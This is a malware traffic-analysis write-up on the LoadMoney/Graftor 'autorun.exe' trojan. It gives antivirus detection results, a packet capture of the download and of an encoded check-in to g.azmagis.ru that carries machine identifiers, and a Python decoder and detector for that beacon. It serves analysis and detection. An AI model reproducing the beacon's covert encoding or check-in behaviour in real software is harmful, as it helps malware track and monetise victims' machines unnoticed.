Graftor LoadMoney 185.20.186.52 Malware Trojan Clickfraud PCAP File Download Traffic Analysis

SHA256: 572b756cd5cfda893c5e32f7bdcb4e44d57e7101b507afcdee8646b3417fe6e3
File name: autorun.exe
Detection ratio: 47 / 56
Analysis date: 2016-11-26 23:22:55 UTC
AhnLab-V3 PUP/Win32.LoadMoney.C1370399 20161126
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161126
Arcabit Trojan.Graftor.D42051 20161126
Avast Win32:Malware-gen 20161126
Avira (no cloud) APPL/Agent.755 20161126
BitDefender Gen:Variant.Graftor.270417 20161126
CAT-QuickHeal Trojan.Mupad 20161126
Comodo ApplicUnwnt.Win32.RuKometa.~A 20161126
CrowdStrike Falcon (ML) malicious_confidence_68% (D) 20161024
Cyren W32/Selfdel.N 20161127
DrWeb Trojan.LoadMoney.1377 20161127
ESET-NOD32 a variant of Win32/RuKometa.E potentially unwanted 20161126
Emsisoft Gen:Variant.Graftor.270417 (B) 20161127
F-Prot W32/Selfdel.N 20161127
F-Secure Gen:Variant.Graftor.270417 20161127
Fortinet W32/SelfDel.BTBP!tr 20161127
GData Gen:Variant.Graftor.270417

2016-11-26 17:34:54.019260 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [P.], seq 0:386, ack 1, win 256, length 386: HTTP: GET /autorun.exe HTTP/1.1
E….K@……..fRv.`.G.P~..:.S..P…….GET /autorun.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 07 Apr 2016 10:57:14 GMT
If-None-Match: "57063d0a-30a50"
Host: uhfoeujcqfoihdi.referparty.ru
Connection: Keep-Alive

2016-11-26 17:34:54.169528 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [.], ack 172, win 255, length 0
E..(.L@……..fRv.`.G.P~….S..P…9………
2016-11-26 17:34:54.171251 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [F.], seq 386, ack 172, win 255, length 0
E..(.M@……..fRv.`.G.P~….S..P…9………
2016-11-26 17:34:57.514854 IP 192.168.1.102.62604 > 75.75.75.75.53: 25856+ A? crl.usertrust.com. (35)
E..?…….R…fKKKK…5.+.We…………crl    usertrust.com…..
2016-11-26 17:34:57.536654 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [S], seq 1392431157, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..f..S..H.PR..5…… ..3…………..
2016-11-26 17:34:57.572643 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [.], ack 1689782253, win 256, length 0
E..(..@……..f..S..H.PR..6d…P….Q……..
2016-11-26 17:34:57.573155 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [P.], seq 0:198, ack 1, win 256, length 198: HTTP: GET /AddTrustExternalCARoot.crl HTTP/1.1
E…..@….’…f..S..H.PR..6d…P…….GET /AddTrustExternalCARoot.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.usertrust.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2016-11-26 17:35:01.948228 IP 192.168.1.102.51018 > 185.20.186.52.80: Flags [P.], seq 0:488, ack 1, win 256, length 488: HTTP: GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E…..@……..f…4.J.Pl1…..eP….x..GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: autorun 3.20
Host: g.azmagis.ru
Cache-Control: no-cache
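The check-in to g.azmagis.ru above carries its parameters as a run of %XX escapes, and each escaped byte is simply an ASCII character with its two nibbles swapped (%f3 is '?', %07 is 'p', %d3 is '='). The decoder below is an added example, not code from the original post: it reverses the swap on the path copied from the capture, parses the resulting query string into its fields, and gives a check that flags request paths using this encoding so the beacon can be recognised in proxy or IDS logs.

```python
import re
from urllib.parse import parse_qs

# Request path copied from the tcpdump output above (the GET to g.azmagis.ru).
SAMPLE_PATH = (
    "/%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3"
    "%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43"
    "%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46"
    "%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33"
    "%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33"
    "%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6"
)

# A path made of nothing but %XX escapes, as this beacon's is.
ESCAPED_ONLY = re.compile(r"^/(?:%[0-9a-fA-F]{2})+$")

def decode_swapped_path(path: str) -> str:
    """Reverse the encoding: each %XY escape is one byte whose two nibbles
    were swapped, so %f3 -> 0x3f '?', %07 -> 0x70 'p', %d3 -> 0x3d '='."""
    raw = bytearray()
    for pair in re.findall(r"%([0-9a-fA-F]{2})", path):
        b = int(pair, 16)
        raw.append(((b & 0x0F) << 4) | (b >> 4))
    # latin-1 never fails to decode, so a wrong guess can still be inspected
    return raw.decode("latin-1")

def is_swapped_beacon(path: str) -> bool:
    """Detection check: an all-escaped path whose nibble-swapped bytes form a
    printable ASCII query string (it starts with '?')."""
    if not ESCAPED_ONLY.match(path):
        return False
    text = decode_swapped_path(path)
    return text.startswith("?") and all(32 <= ord(c) < 127 for c in text)

def parse_checkin(path: str) -> dict:
    """Return the beacon's fields (prod, version, guid, mid, os, bit, action)
    as a plain dict; an empty dict means the path is not this beacon."""
    if not is_swapped_beacon(path):
        return {}
    query = decode_swapped_path(path)[1:]  # drop the leading '?'
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

if __name__ == "__main__":
    print(decode_swapped_path(SAMPLE_PATH))
    print(parse_checkin(SAMPLE_PATH))
```

The decoded query names the product and version seen in the User-Agent header ("autorun 3.20"), two 32-hex-digit identifiers (guid, mid), the OS version and bitness, and an action field.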